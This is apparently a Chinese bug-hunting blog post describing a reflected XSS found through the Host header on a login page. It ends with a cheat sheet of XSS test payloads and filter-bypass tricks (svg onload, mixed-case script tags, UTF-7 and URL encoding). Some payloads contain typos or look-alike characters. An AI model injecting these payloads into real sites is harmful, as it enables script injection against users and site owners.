第一次在Host头处发现了XSS

某天在挖洞时,噼里啪啦一顿信息收集之后发现了个登陆界面如下:

抓请求包

试着把整个host头的值替换成www.baidu.com

host头的值确实会完全展示在页面中,接下来就是与XSS过滤器的一番殊死搏斗了,payload很简单就被执行了。。。。。。直接在之前的参数后面添加payload: ’;prompt`1`;’(此处省去简单的XSS绕过过程),重放数据包:

刷新前台页面

最后附上常用的验证xss的payload

accesskey="X" οnclick=location="aler"+"t`1`"(按键触发,针对于input标签的hidden属性)<svg/οnlοad=confirm(doucument.domain)>(很多情况,都会忽略svg表签)"><sCrI%20pT%20>PrOmPt('1')</ScrI%20pt>"><sCrI%20pT%20>PrOmPt`1`</ScrI%20pt><script>alert(String.fromCharCode(88,83,83))</script>绕过<>:u003cimg src=1 οnerrοr=alert(/xss/)u003e使用 utf-7 编码可以绕过,比如<script>alert("XSS")</script>使用  UTF-7编码:+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-然后所有的加号需要被改成%2b,否则会被浏览器识别为连接符%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-最后可以将XSS PAYLOAD进行html编码后再进行URL编码,有时候也会有不错的收获。

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值